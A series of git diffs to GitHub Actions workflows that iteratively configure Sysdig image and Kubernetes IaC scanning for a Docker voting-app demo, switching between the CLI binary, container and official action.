+          SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          SYSDIG_API_URL: https://app.au1.sysdig.com
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
+            -e SYSDIG_API_TOKEN \
+            -e SYSDIG_API_URL \
+            quay.io/sysdig/sysdig-cli-scanner \
               docker://voting-app
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
+            -e SYSDIG_API_TOKEN \
+            -e SYSDIG_API_URL \
+            quay.io/sysdig/sysdig-cli-scanner \
               docker://worker
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
+            -e SYSDIG_API_TOKEN \
+            -e SYSDIG_API_URL \
+            quay.io/sysdig/sysdig-cli-scanner \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,1 +1,35 @@
-404: Not Found
+name: Sysdig Image Scan
+
+on:
+  push:
+    branches:
+      - main
+  workflow_dispatch:
+
+jobs:
+  image-scan:
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Build Docker images
+        run: |
+          docker build -t voting-app ./voting-app
+          docker build -t worker ./worker
+          docker build -t result ./result
+
+      - name: Download Sysdig CLI Scanner
+        run: |
+          curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner
+          chmod +x scanner
+
+      - name: Run Sysdig Scan on voting-app
+        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app
+
+      - name: Run Sysdig Scan on worker
+        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker
+
+      - name: Run Sysdig Scan on result
+        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -22,7 +22,7 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner
+          curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64
           chmod +x scanner
 
       - name: Run Sysdig Scan on voting-app

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout source
+      - name: Checkout code
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -20,18 +20,20 @@ jobs:
           docker build -t result ./result
 
       - name: Download Sysdig CLI Scanner
-        run: | 
-　　　　　version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
-    　　　echo "Latest version is $version"
-    　　　curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
-    　　　chmod +x sysdig-cli-scanner
-    　　　./sysdig-cli-scanner --version
-      - name: Run Sysdig Image Scan
+        run: |
+          echo "Fetching latest scanner version..."
+          VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
+          echo "Latest version: $VERSION"
+          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
+          chmod +x sysdig-cli-scanner
+          ./sysdig-cli-scanner --version
+
+      - name: Run Sysdig Scan
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
         run: |
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -17,7 +17,7 @@ jobs:
       - name: 🛎️ Checkout code
         uses: actions/checkout@v3
 
-      - name: 🐳 Build Docker images
+      - name: 🏗️ Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
@@ -41,37 +41,12 @@ jobs:
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
+            -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
             -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl $SYS_DIG_SECURE_URL \
-              --skiptlsverify \
               --loglevel debug \
+              --skiptlsverify \
               docker://voting-app
-
-      - name: 🔍 Run Sysdig Scan (worker)
-        run: |
-          docker run --rm \
-            --platform linux/amd64 \
-            --user 0 \
-            -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
-            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --skiptlsverify \
-              --loglevel debug \
-              docker://worker
-
-      - name: 🔍 Run Sysdig Scan (result)
-        run: |
-          docker run --rm \
-            --platform linux/amd64 \
-            --user 0 \
-            -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
-            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --skiptlsverify \
-              --loglevel debug \
-              docker://result
 

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -12,7 +12,7 @@ on:
 
 jobs:
   scan:
-    name: Sysdig Scan Docker + IaC (Docker version)
+    name: Sysdig Scan Docker + IaC (loaded image method)
     runs-on: ubuntu-latest
 
     steps:
@@ -27,10 +27,15 @@ jobs:
           docker build -t vote-image ./vote
           docker save vote-image -o vote-image.tar
 
-      - name: Scan Docker image from archive with Sysdig
+      - name: Load and tag image
         run: |
-          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar             quay.io/sysdig/sysdig-cli-scanner:latest             --standalone             --input-file /tmp/vote-image.tar             vote-image:ci
+          docker load -i vote-image.tar
+          docker tag vote-image:latest vote-image:ci
+
+      - name: Scan Docker image using tag
+        run: |
+          docker run --rm             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             vote-image:ci
 
       - name: Scan IaC (k8s-specifications)
         run: |
-          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications
+          docker run --rm             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -16,34 +16,21 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-    - name: Checkout code
-      uses: actions/checkout@v3
+      - name: Checkout code
+        uses: actions/checkout@v3
 
-    - name: Set up Docker Buildx
-      uses: docker/setup-buildx-action@v2
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@v2
 
-    - name: Build vote image
-      run: |
-        docker build -t vote-image ./vote
-        docker save vote-image -o vote-image.tar
+      - name: Build vote image
+        run: |
+          docker build -t vote-image ./vote
+          docker save vote-image -o vote-image.tar
 
-    - name: Scan Docker image from archive with Sysdig
-      run: |
-        docker run --rm \
-　　　　　--platform linux/amd64 \
-          -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
-          -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
-          quay.io/sysdig/sysdig-cli-scanner:latest \
-          --standalone \
-          --input-file /tmp/vote-image.tar \
-          vote-image:ci
+      - name: Scan Docker image with Sysdig (latest + amd64)
+        run: |
+          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar             quay.io/sysdig/sysdig-cli-scanner:latest             --standalone             --input-file /tmp/vote-image.tar             vote-image:ci
 
-    - name: Scan IaC (k8s-specifications)
-      run: |
-        docker run --rm \
-          --platform linux/amd64 \
-          -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
-          -v ${{ github.workspace }}:/iac \
-          quay.io/sysdig/sysdig-cli-scanner:latest \
-          --apiurl ${{ secrets.SYSDIG_API_URL }} \
-          --iac scan /iac/k8s-specifications
+      - name: Scan IaC (k8s-specifications)
+        run: |
+          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig Tech Assessment CI
+name: Sysdig Tech Assessment CI (CLI Scanner)
 
 on:
   push:
@@ -12,7 +12,7 @@ on:
 
 jobs:
   scan:
-    name: Build & Scan Docker Images + IaC
+    name: Scan vote/worker/result with CLI Scanner + IaC
     runs-on: ubuntu-latest
 
     steps:
@@ -22,24 +22,40 @@ jobs:
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@v2
 
-      - name: Build Docker images
+      - name: Build and save Docker images
         run: |
           docker build -t vote-image ./vote
           docker build -t worker-image ./worker
           docker build -t result-image ./result
+          docker save vote-image -o vote-image.tar
+          docker save worker-image -o worker-image.tar
+          docker save result-image -o result-image.tar
 
-      - name: Scan vote image
+      - name: Download Sysdig CLI Scanner (latest Linux amd64)
         run: |
-          docker run --rm             quay.io/sysdig/secure-inline-scan:2             vote-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
+          curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner"
+          chmod +x sysdig-cli-scanner
 
-      - name: Scan worker image
+      - name: Scan vote image (.tar) with CLI Scanner
         run: |
-          docker run --rm             quay.io/sysdig/secure-inline-scan:2             worker-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
+          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
 
-      - name: Scan result image
+      - name: Scan worker image (.tar) with CLI Scanner
         run: |
-          docker run --rm             quay.io/sysdig/secure-inline-scan:2             result-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
+          ./sysdig-cli-scanner             --standalone             --input-file worker-image.tar             worker-image:ci
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+
+      - name: Scan result image (.tar) with CLI Scanner
+        run: |
+          ./sysdig-cli-scanner             --standalone             --input-file result-image.tar             result-image:ci
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
 
       - name: Scan IaC (k8s-specifications)
         run: |
-          docker run --rm             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications
+          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -4,9 +4,11 @@ on:
   pull_request:
     branches:
       - main
+      - ci/sysdig-integration
   push:
     branches:
       - main
+      - ci/sysdig-integration
 
 jobs:
   scan:

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,11 +1,11 @@
 name: Sysdig CI Scan
 
 on:
-  pull_request:
+  push:
     branches:
       - main
       - ci/sysdig-integration
-  push:
+  pull_request:
     branches:
       - main
       - ci/sysdig-integration
@@ -27,15 +27,15 @@ jobs:
         docker build -t vote-image ./vote
         docker save vote-image -o vote-image.tar
 
-    - name: Scan Docker image with Sysdig
+    - name: Scan Docker image from archive with Sysdig (standalone)
       run: |
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
           quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-          --standalone
+          --standalone \
           --input-file /tmp/vote-image.tar \
-          dockersamples/examplevotingapp_vote
+          vote-image:ci
 
     - name: Scan IaC (k8s-specifications)
       run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -12,7 +12,7 @@ on:
 
 jobs:
   scan:
-    name: Sysdig Scan Docker + IaC
+    name: Sysdig Scan Docker + IaC (Docker version)
     runs-on: ubuntu-latest
 
     steps:
@@ -27,19 +27,10 @@ jobs:
           docker build -t vote-image ./vote
           docker save vote-image -o vote-image.tar
 
-      - name: Download Sysdig CLI Scanner (latest for amd64)
+      - name: Scan Docker image from archive with Sysdig
         run: |
-          curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner"
-          chmod +x sysdig-cli-scanner
-
-      - name: Scan Docker image from archive
-        run: |
-          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci             --console-log             --detailed-policies-eval             --full-vulns-table
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar             quay.io/sysdig/sysdig-cli-scanner:latest             --standalone             --input-file /tmp/vote-image.tar             vote-image:ci
 
       - name: Scan IaC (k8s-specifications)
         run: |
-          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -25,14 +25,16 @@ jobs:
     - name: Build vote image
       run: |
         docker build -t vote-image ./vote
+        docker save vote-image -o vote-image.tar
 
     - name: Scan Docker image with Sysdig
       run: |
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
+          -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
           quay.io/sysdig/sysdig-cli-scanner:latest \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
-          vote-image
+          --input /tmp/vote-image.tar
 
     - name: Scan IaC (k8s-specifications)
       run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -34,7 +34,7 @@ jobs:
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
           quay.io/sysdig/sysdig-cli-scanner:latest \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
-          --input /tmp/vote-image.tar
+          --image-archive /tmp/vote-image.tar
 
     - name: Scan IaC (k8s-specifications)
       run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig CI Scan
+name: Sysdig Tech Assessment CI
 
 on:
   push:
@@ -12,24 +12,33 @@ on:
 
 jobs:
   scan:
-    name: Sysdig Scan Docker + IaC (with docker.sock)
+    name: Build & Scan Docker Images + IaC
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout code
+      - name: Checkout repository
         uses: actions/checkout@v3
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@v2
 
-      - name: Build vote image
+      - name: Build Docker images
         run: |
           docker build -t vote-image ./vote
-          docker tag vote-image vote-image:ci
+          docker build -t worker-image ./worker
+          docker build -t result-image ./result
 
-      - name: Scan Docker image using docker.sock
+      - name: Scan vote image
         run: |
-          docker run --rm             -v /var/run/docker.sock:/var/run/docker.sock             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             vote-image:ci
+          docker run --rm             quay.io/sysdig/secure-inline-scan:2             vote-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
+
+      - name: Scan worker image
+        run: |
+          docker run --rm             quay.io/sysdig/secure-inline-scan:2             worker-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
+
+      - name: Scan result image
+        run: |
+          docker run --rm             quay.io/sysdig/secure-inline-scan:2             result-image             --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}             --sysdig-url ${{ secrets.SYSDIG_API_URL }}
 
       - name: Scan IaC (k8s-specifications)
         run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -27,15 +27,19 @@ jobs:
           docker build -t vote-image ./vote
           docker save vote-image -o vote-image.tar
 
-      - name: Download Sysdig CLI Scanner
+      - name: Download Sysdig CLI Scanner (latest for amd64)
         run: |
-          curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner
+          curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner"
           chmod +x sysdig-cli-scanner
 
-      - name: Scan Docker image from archive with Sysdig (binary)
+      - name: Scan Docker image from archive
         run: |
-          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci             --console-log             --detailed-policies-eval             --full-vulns-table             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}
+          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci             --console-log             --detailed-policies-eval             --full-vulns-table
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
 
       - name: Scan IaC (k8s-specifications)
         run: |
-          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}
+          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -34,7 +34,8 @@ jobs:
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
           quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
           --standalone
-          --input-file /tmp/vote-image.tar
+          --input-file /tmp/vote-image.tar \
+          dockersamples/examplevotingapp_vote
 
     - name: Scan IaC (k8s-specifications)
       run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,28 +1,31 @@
-name: Sysdig Scan (Official Action)
+name: Sysdig Secure Scanning
 
 on:
   push:
-    branches:
-      - main
-      - ci/sysdig-integration
+    branches: [main, ci/sysdig-integration]
   pull_request:
-    branches:
-      - main
-      - ci/sysdig-integration
+    branches: [main, ci/sysdig-integration]
 
 jobs:
   scan:
-    name: Docker + IaC Scan via Sysdig Action
     runs-on: ubuntu-latest
+    name: Scan vote / worker / result + IaC
 
     steps:
       - name: Checkout source
         uses: actions/checkout@v3
 
-      - name: Build vote Docker image
-        run: |
-          docker build ./vote -t vote-app:${{ github.sha }}
+      # Build Docker images
+      - name: Build vote image
+        run: docker build ./vote -t vote-app:${{ github.sha }}
 
+      - name: Build worker image
+        run: docker build ./worker -t worker-app:${{ github.sha }}
+
+      - name: Build result image
+        run: docker build ./result -t result-app:${{ github.sha }}
+
+      # Scan vote
       - name: Scan vote image with Sysdig
         uses: sysdiglabs/scan-action@v6
         with:
@@ -30,13 +33,37 @@ jobs:
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
+          cli-scanner-version: 1.22.3
 
-      - name: Scan Kubernetes IaC manifests
+      # Scan worker
+      - name: Scan worker image with Sysdig
         uses: sysdiglabs/scan-action@v6
         with:
+          image-tag: worker-app:${{ github.sha }}
+          sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
+          stop-on-processing-error: true
+          cli-scanner-version: 1.22.3
+
+      # Scan result
+      - name: Scan result image with Sysdig
+        uses: sysdiglabs/scan-action@v6
+        with:
+          image-tag: result-app:${{ github.sha }}
+          sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
+          stop-on-processing-error: true
+          cli-scanner-version: 1.22.3
+
+      # Scan IaC
+      - name: Scan Kubernetes IaC manifests
+        uses: sysdiglabs/scan-action@v6
+        continue-on-error: true  # IaC scan failure should not block main scan
+        with:
           mode: iac
-          cli-scanner-version: 1.24.2
           iac-scan-path: k8s-specifications
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
+          cli-scanner-version: 1.23.3
+

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,0 +1,42 @@
+name: Sysdig CI Scan
+
+on:
+  pull_request:
+    branches:
+      - main
+  push:
+    branches:
+      - main
+
+jobs:
+  scan:
+    name: Sysdig Scan Docker + IaC
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout code
+      uses: actions/checkout@v3
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v2
+
+    - name: Build vote image
+      run: |
+        docker build -t vote-image ./vote
+
+    - name: Scan Docker image with Sysdig
+      run: |
+        docker run --rm \
+          -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
+          quay.io/sysdig/sysdig-cli-scanner:latest \
+          --apiurl ${{ secrets.SYSDIG_API_URL }} \
+          vote-image
+
+    - name: Scan IaC (k8s-specifications)
+      run: |
+        docker run --rm \
+          -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
+          -v ${{ github.workspace }}:/iac \
+          quay.io/sysdig/sysdig-cli-scanner:latest \
+          --apiurl ${{ secrets.SYSDIG_API_URL }} \
+          --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -27,12 +27,12 @@ jobs:
         docker build -t vote-image ./vote
         docker save vote-image -o vote-image.tar
 
-    - name: Scan Docker image from archive with Sysdig (standalone)
+    - name: Scan Docker image from archive with Sysdig (v1.24.2)
       run: |
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
-          quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+          quay.io/sysdig/sysdig-cli-scanner:1.24.2 \
           --standalone \
           --input-file /tmp/vote-image.tar \
           vote-image:ci
@@ -42,6 +42,6 @@ jobs:
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}:/iac \
-          quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+          quay.io/sysdig/sysdig-cli-scanner:1.24.2 \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
           --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig Tech Assessment CI (CLI Scanner)
+name: Sysdig Scan (Official Action)
 
 on:
   push:
@@ -12,50 +12,31 @@ on:
 
 jobs:
   scan:
-    name: Scan vote/worker/result with CLI Scanner + IaC
+    name: Docker + IaC Scan via Sysdig Action
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout repository
+      - name: Checkout source
         uses: actions/checkout@v3
 
-      - name: Set up Docker Buildx
-        uses: docker/setup-buildx-action@v2
-
-      - name: Build and save Docker images
+      - name: Build vote Docker image
         run: |
-          docker build -t vote-image ./vote
-          docker build -t worker-image ./worker
-          docker build -t result-image ./result
-          docker save vote-image -o vote-image.tar
-          docker save worker-image -o worker-image.tar
-          docker save result-image -o result-image.tar
+          docker build ./vote -t vote-app:${{ github.sha }}
 
-      - name: Download Sysdig CLI Scanner (latest Linux amd64)
-        run: |
-          curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner"
-          chmod +x sysdig-cli-scanner
+      - name: Scan vote image with Sysdig
+        uses: sysdiglabs/scan-action@v6
+        with:
+          image-tag: vote-app:${{ github.sha }}
+          sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
+          stop-on-processing-error: true
 
-      - name: Scan vote image (.tar) with CLI Scanner
-        run: |
-          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
-
-      - name: Scan worker image (.tar) with CLI Scanner
-        run: |
-          ./sysdig-cli-scanner             --standalone             --input-file worker-image.tar             worker-image:ci
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
-
-      - name: Scan result image (.tar) with CLI Scanner
-        run: |
-          ./sysdig-cli-scanner             --standalone             --input-file result-image.tar             result-image:ci
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
-
-      - name: Scan IaC (k8s-specifications)
-        run: |
-          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+      - name: Scan Kubernetes IaC manifests
+        uses: sysdiglabs/scan-action@v6
+        with:
+          mode: iac
+          cli-scanner-version: 1.24.2
+          iac-scan-path: k8s-specifications
+          sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
+          stop-on-processing-error: true

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -27,10 +27,15 @@ jobs:
           docker build -t vote-image ./vote
           docker save vote-image -o vote-image.tar
 
-      - name: Scan Docker image with Sysdig (latest + amd64)
+      - name: Download Sysdig CLI Scanner
         run: |
-          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar             quay.io/sysdig/sysdig-cli-scanner:latest             --standalone             --input-file /tmp/vote-image.tar             vote-image:ci
